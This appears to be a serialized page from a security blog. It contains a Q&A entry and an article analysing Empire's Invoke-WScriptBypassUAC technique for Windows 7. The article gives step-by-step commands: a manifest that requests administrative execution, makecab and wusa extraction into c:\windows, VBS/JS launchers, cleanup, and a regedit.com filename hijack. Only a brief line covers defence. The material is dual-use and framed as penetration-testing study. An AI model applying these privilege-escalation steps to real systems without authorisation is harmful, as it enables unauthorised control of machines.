[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f4_D_780GHdJs8QRgzfafzGG4klNYtOm0Wf5St6j_xps":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":33,"aiModel":30,"aiConfidence":30,"updatedAt":49,"createdAt":49,"_status":48},337,"How does Invoke-WScriptBypassUAC bypass UAC on Windows 7?","The technique exploits the `wusa.exe` utility to extract CAB files to high-privilege directories like `C:\\Windows` without administrator rights. It first creates a specially crafted `wscript.exe.manifest` file that requests administrative execution level, then uses `makecab.exe` to compress it along with a copy of `wscript.exe`. By running `wusa` to extract these files to `C:\\Windows`, an attacker can then execute `C:\\Windows\\wscript.exe` with admin-level privileges, effectively bypassing UAC. For full details, see the [original analysis](\u002Fnews\u002Fanalysis-of-invoke-wscriptbypassuac-exploitation-in-empire).","\u003Cp>The technique exploits the `wusa.exe` utility to extract CAB files to high-privilege directories like `C:\\Windows` without administrator rights. It first creates a specially crafted `wscript.exe.manifest` file that requests administrative execution level, then uses `makecab.exe` to compress it along with a copy of `wscript.exe`. By running `wusa` to extract these files to `C:\\Windows`, an attacker can then execute `C:\\Windows\\wscript.exe` with admin-level privileges, effectively bypassing UAC. For full details, see the [original analysis](\u002Fnews\u002Fanalysis-of-invoke-wscriptbypassuac-exploitation-in-empire).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fanalysis-of-invoke-wscriptbypassuac-exploitation-in-empire\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-does-invoke-wscriptbypassuac-bypass-uac-on-windows-7-1777484119710","UAC bypass, wusa.exe, wscript.exe, manifest, Empire, privilege escalation",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":27,"cover":30,"author":31,"views":19,"readingTime":32,"status":33,"publishedAt":34,"seo":35,"tags":39,"qaPairs":40,"meta":45,"updatedAt":46,"createdAt":47,"_status":48},86,"Analysis of Invoke-WScriptBypassUAC Exploitation in Empire","analysis-of-invoke-wscriptbypassuac-exploitation-in-empire","Analyze Invoke-WScriptBypassUAC from Empire for UAC bypass on Win7. Learn exploitation principles, manual testing steps, and defense insights for penetration testing.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The well-known post-exploitation framework Empire serves as an excellent learning template, and the post-exploitation techniques it contains are worthy of in-depth study.\u003C\u002Fp>\u003Cp>This article will select a classic UAC bypass method in Empire, Invoke-WScriptBypassUAC, for analysis, introducing its bypass principles and more exploitation techniques in penetration testing. Understanding how to exploit is key to knowing how to defend.\u003C\u002Fp>\u003Cp>Invoke-WScriptBypassUAC address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FEmpireProject\u002FEmpire\u002Fblob\u002Fmaster\u002Fdata\u002Fmodule_source\u002Fprivesc\u002FInvoke-WScriptBypassUAC.ps1\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Invoke-WScriptBypassUAC bypass principles\u003C\u002Fli>\u003Cli>Exploitation extensions\u003C\u002Fli>\u003Cli>Defense and detection\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Invoke-WScriptBypassUAC Bypass Principles\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Invoke-WScriptBypassUAC is implemented via PowerShell, conceptually drawing inspiration from the GitHub shared by Vozzie, with the address as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FVozzie\u002Fuacscript\u003C\u002Fp>\u003Cp>Vozzie mentioned that ZDI and Microsoft chose to ignore this UAC bypass 'vulnerability'; ZDI considers it not a remote vulnerability, and Microsoft views UAC bypass as not falling within the scope of vulnerabilities.\u003C\u002Fp>\u003Cp>Invoke-WScriptBypassUAC employs some practical minor techniques in its implementation, so this article primarily analyzes the bypass method of Invoke-WScriptBypassUAC.\u003C\u002Fp>\u003Cp>This method is only applicable to Win7 and does not apply to Win8 or Win10 (reasons explained later).\u003C\u002Fp>\u003Cp>Test system: Win7 x86\u003C\u002Fp>\u003Cp>Since the source code in PowerShell format is publicly available, the key operational flow of the script is directly introduced:\u003C\u002Fp>\u003Col>\u003Cli>Check if the operating system is Win7 and if the permissions are standard.\u003C\u002Fli>\u003Cli>Release the file wscript.exe.manifest in the Temp directory.\u003C\u002Fli>\u003Cli>Use makecab.exe to compress wscript.exe.manifest and wscript.exe.\u003C\u002Fli>\u003Cli>Use wusa to extract the compressed package, releasing wscript.exe.manifest and wscript.exe to the c:\\Windows directory.\u003C\u002Fli>\u003Cli>The payload is stored in the ADS of the Appdata folder.\u003C\u002Fli>\u003Cli>Use c:\\Windows\\wscript.exe to execute the payload, achieving admin privilege execution of the payload and bypassing UAC.\u003C\u002Fli>\u003C\u002Fol>\u003Ch2>0x03 Exploitation Extension\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Once you master the operational process, we can manually conduct split testing, during which more exploitation ideas can be discovered.\u003C\u002Fp>\u003Ch3>1. Save the wscript.exe.manifest file\u003C\u002Fh3>\u003Cp>The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?-->\u003Cbr>\u003Cassembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" \u003Cbr=\"\">          xmlns:asmv3=\"urn:schemas-microsoft-com:asm.v3\"\u003Cbr>          manifestVersion=\"1.0\"&gt;\u003Cbr>  \u003Casmv3:trustinfo>\u003Cbr>    \u003Csecurity>\u003Cbr>      \u003Crequestedprivileges>\u003Cbr>        \u003Crequestedexecutionlevel level=\"RequireAdministrator\" uiaccess=\"false\">\u003Cbr>      \u003C\u002Frequestedexecutionlevel>\u003C\u002Frequestedprivileges>\u003Cbr>    \u003C\u002Fsecurity>\u003Cbr>  \u003C\u002Fasmv3:trustinfo>\u003Cbr>  \u003Casmv3:application>\u003Cbr>    \u003Casmv3:windowssettings xmlns=\"http:\u002F\u002Fschemas.microsoft.com\u002FSMI\u002F2005\u002FWindowsSettings\">\u003Cbr>      \u003Cautoelevate>true\u003C\u002Fautoelevate>\u003Cbr>      \u003Cdpiaware>true\u003C\u002Fdpiaware>\u003Cbr>    \u003C\u002Fasmv3:windowssettings>\u003Cbr>  \u003C\u002Fasmv3:application>\u003Cbr>\u003C\u002Fassembly>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Use makecab to create CAB files\u003C\u002Fh3>\u003Cp>cmd:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>makecab c:\\windows\\system32\\wscript.exe %TMP%\\1.tmp\u003Cbr>makecab wscript.exe.manifest %TMP%\\2.tmp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Use wusa to extract CAB files and deploy to c:\\windows\u003C\u002Fh3>\u003Cp>cmd:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wusa %TMP%\\1.tmp \u002Fextract:\"c:\\windows\" \u002Fquiet\u003Cbr>wusa %TMP%\\2.tmp \u002Fextract:\"c:\\windows\" \u002Fquiet\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The key to the success of this method lies in using wusa to extract the cab file to c:\\windows. Typically, releasing files to the c:\\windows directory requires administrator privileges, but with wusa, ordinary user privileges suffice. Of course, other directories with administrator privileges can also be used, such as: C:\\Windows\\addins\u003C\u002Fp>\u003Ch3>4. Use this wscript.exe to execute vbs or js scripts\u003C\u002Fh3>\u003Cp>cmd:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>c:\\windows\\wscript.exe c:\\test\\1.vbs\u003Cbr>c:\\windows\\wscript.exe c:\\test\\1.js\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Here, js and vbs scripts require absolute paths. Although it is a cmd with ordinary user privileges, because wscript.exe.manifest in the same directory as wscript.exe specifies to start with administrator privileges, the executed vbs or js scripts run with administrator privileges, thereby achieving UAC bypass.\u003C\u002Fp>\u003Cp>The vbs script corresponding to executing cmd commands is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Dim objShell\u003Cbr>Dim oFso\u003Cbr>Set oFso = CreateObject(\"Scripting.FileSystemObject\")\u003Cbr>Set objShell = WScript.CreateObject(\"WScript.Shell\")\u003Cbr>command = \"cmd \u002Fc calc.exe\"\u003Cbr>objShell.Run command, 0\u003Cbr>Set objShell = Nothing\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The corresponding JavaScript script is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>new ActiveXObject(\"WScript.Shell\").Run(\"cmd \u002Fc calc.exe\",0,true);\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>5. Clear cache files after bypass\u003C\u002Fh3>\u003Cp>Delete wscript.exe and wscript.exe.manifest under c:\\windows\\\u003C\u002Fp>\u003Cp>The corresponding VBS script is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Dim objShell\u003Cbr>Dim oFso\u003Cbr>Set oFso = CreateObject(\"Scripting.FileSystemObject\")\u003Cbr>Set objShell = WScript.CreateObject(\"WScript.Shell\")\u003Cbr>command = \"cmd \u002Fc del c:\\windows\\wscript.exe &amp;&amp; del c:\\windows\\wscript.exe.manifest\"\u003Cbr>objShell.Run command, 0\u003Cbr>Set objShell = Nothing\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The corresponding JavaScript script is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>new ActiveXObject(\"WScript.Shell\").Run(\"cmd \u002Fc del c:\\\\windows\\\\wscript.exe &amp;&amp; del c:\\\\windows\\\\wscript.exe.manifest\",0,true);\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Deleting wscript.exe and wscript.exe.manifest under c:\\windows\\ requires administrator privileges\u003C\u002Fp>\u003Cp>Delete cache files:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>del %TMP%\\1.tmp\u003Cbr>del %TMP%\\2.tmp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>6. Supplement\u003C\u002Fh3>\u003Cp>(1) There are many paths available for exploitation; to view folder properties, use the following PowerShell command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-Acl -Path c:\\windows|select Owner\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) There are many paths to save vbs or js scripts, such as special ADS:\u003C\u002Fp>\u003Cul>\u003Cli>...files\u003C\u002Fli>\u003Cli>Special COM files\u003C\u002Fli>\u003Cli>Disk root directory\u003C\u002Fli>\u003C\u002Ful>\u003Cp>For more details, refer to the article 'Advanced Exploitation Techniques of Hidden Alternative Data Streams'\u003C\u002Fp>\u003Cp>Of course, the ADS location used by Invoke-WScriptBypassUAC is also very hidden\u003C\u002Fp>\u003Cp>$env:USERPROFILE\\AppData is a system hidden file by default\u003C\u002Fp>\u003Cp>Therefore, using dir \u002Fr cannot see the folder $env:USERPROFILE\\AppData, and naturally cannot see the added ADS\u003C\u002Fp>\u003Cp>To see it, you need to use dir \u002Fa:h \u002Fr (\u002Fa:h specifies viewing system hidden files), or view all files: dir \u002Fa \u002Fr\u003C\u002Fp>\u003Cp>(3) Reason for Win8 failure\u003C\u002Fp>\u003Cp>Using makecab and wusa can extract cab files to high-privilege directories, such as c:\\windows\u003C\u002Fp>\u003Cp>However, the method of achieving high-privilege execution using wscript.exe and wscript.exe.manifest fails, as Win8 uses embedded manifests\u003C\u002Fp>\u003Cp>(4) Reason for Win10 failure\u003C\u002Fp>\u003Cp>Win10 systems cannot use makecab and wusa to extract cab files to high-privilege directories, such as c:\\windows\u003C\u002Fp>\u003Cp>Of course, embedded manifests are also used\u003C\u002Fp>\u003Ch2>0x04 Further exploitation of wusa feature\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>wusa feature:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Under normal user permissions, files can be released to administrator-privileged folders\u003C\u002Fp>\u003Cp>Applicable to Win7, Win8\u003C\u002Fp>\u003Ch3>Exploitation one: Filename hijacking\u003C\u002Fh3>\u003Cp>1. Rename calc.exe to regedit.com\u003C\u002Fp>\u003Cp>2. Release the file regedit.com in c:\\windows\u003C\u002Fp>\u003Cp>cmd：\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>makecab c:\\test\\regedit.com %TMP%\\1.tmp\u003Cbr>wusa %TMP%\\1.tmp \u002Fextract:\"c:\\windows\" \u002Fquiet\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>3、Hijacking\u003C\u002Fp>\u003Cp>Entering regedit in cmd will execute regedit.com instead of regedit.exe\u003C\u002Fp>\u003Cp>For details on this exploitation method, refer to the article: 《A dirty way of tricking users to bypass UAC》\u003C\u002Fp>\u003Ch3>Other exploitation methods (omitted for now)\u003C\u002Fh3>\u003Ch2>0x05 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This UAC bypass method only applies to Win7, and no corresponding patch has been seen yet. Antivirus software can intercept this script, but there are also bypass methods.\u003C\u002Fp>\u003Cp>From a defender's perspective, it is recommended to monitor the invocation of wusa.exe.\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article analyzes Invoke-WScriptBypassUAC. Although Microsoft does not recognize this vulnerability, both penetration testers and defenders should pay attention to it during the post-exploitation phase.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr",null,"Onedaysec",5,"published","2026-02-02T08:06:29.587Z",{"title":36,"description":14,"keywords":37,"ogImage":30,"canonicalUrl":30,"noIndex":38},"Invoke-WScriptBypassUAC Analysis: UAC Bypass Exploitation in Empire","UAC bypass, Empire framework, Invoke-WScriptBypassUAC, Windows 7 exploitation, PowerShell, penetration testing, post-exploitation, wscript.exe, wusa, makecab",false,[],{"docs":41,"hasNextPage":38},[42,43,44,4],340,339,338,{"title":30,"description":30,"image":30},"2026-07-24T02:07:25.931Z","2026-07-23T16:01:24.542Z","draft","2026-07-23T16:05:27.449Z"]